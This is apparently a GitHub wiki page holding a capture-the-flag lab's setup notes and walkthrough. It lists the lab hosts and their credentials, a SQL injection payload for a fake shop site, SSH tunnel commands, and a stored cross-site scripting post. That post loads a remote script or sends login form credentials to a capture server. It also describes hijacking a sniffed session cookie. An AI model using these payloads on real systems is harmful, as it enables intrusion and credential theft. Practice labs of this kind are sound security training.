Home - mattharley/phonypictures-ctf GitHub Wiki
Welcome to the phonypictures-ctf wiki!
Ubuntu VM (e.g. 192.168.59.104)
22 - SSH
7000 - LinkedOut
8000 - Amazone
hero / zer02her0 - what i used to create everything
nerdy / l33t - use for ssh
Docker (e.g. 172.17.42.1)
5000 - Intranet Forum
5001 - Capture - POST username,password to write to the page
5002 - SSH
root / b!gb0ss
Amazone.com website. Need to extract username and password for the IT guy. Very simple SQL database with products and users tables. The search field doesn't sanitise its inputs when it runs a:
SELECT * FROM products WHERE name LIKE "blah";
- https://phony-amazone.herokuapp.com/
- login: https://phony-amazone.herokuapp.com/login
hero8arH0SrVhZV7pApyRl - accounts: https://phony-amazone.herokuapp.com/account
- search for
heroand you get your own details: https://phony-amazone.herokuapp.com/account?username=hero - search for
bigbossand you get an error: https://phony-amazone.herokuapp.com/account?username=bigboss - search for
' or 'a'='aand you get everything!: https://phony-amazone.herokuapp.com/account?username=%27+or+%27a%27%3D%27a
Use the IT guy's password to do an SSL tunnel into the company intranet.
ssh -f [email protected] -L 5000:172.17.42.1:5000 -N
ssh -f [email protected] -L 5001:172.17.42.1:5001 -N
and to kill
ps aux | grep 5000
kill XXXXX
Get the bosses's password from Intranet site. The Company Intranet site has a forum page. Posting new items to the page does not strip html / js tags. Can insert:
<script type="text/javascript" src="https://phony-capture.herokuapp.com/static/exploit.js"></script>
or some arbitrary script which uses jquery to access the username/password fields of the login .
Can have all of the login attempts logged at https://phony-capture.herokuapp.com/ and can automatically add the credentials of other people logging in (e.g. the Boss) once the first post is successful.
- https://phony-intranet.herokuapp.com/
- Post the above javascript into a new post:
<script type="text/javascript">
// something like:
$(function() {
$("#submit").click(function() {
data = {
username: $("#username").val(),
password: $("#password").val()
};
//alert("Just posted username: " + data.username + " password: " + data.password);
$.post("http://172.17.42.1:5001", data, function(posted_data , status){
});
});
});
</script>
- Retrieve the list of "stolen" usernames and passwords: https://phony-capture.herokuapp.com/
Watch passing traffic (on something like wireshark). Find a session cookie for FaceBlerg.com. Use a proxy (like burp proxy) or POSTMan (Chrome) to inject this cookie into our session.
- Emails?
- Static Page
- Boss Bossington (Executive VP)
- Nerdy McNerd (IT Guy)
- Hero (Hacker and graduate)
- Shy Introvert (Personal Assistant to Boss)
# get all of the virtual machines on your host:
VBoxManage list vms
# find ip address of our ctf machine
VBoxManage --nologo guestproperty get "Ubuntu 15 Clean" /VirtualBox/GuestInfo/Net/0/V4/IP
hero
zer02her0
nerdy
l33t
sudo apt-get install default-jre- http://pietervogelaar.nl/ubuntu-14-04-install-selenium-as-service-headless
- http://www.installationpage.com/selenium/how-to-run-selenium-headless-firefox-in-ubuntu/
DONT CALL YOUR PYTHON FILE selenium.py !!!!
root
b!gb0ss
ssh -p 5002 [email protected]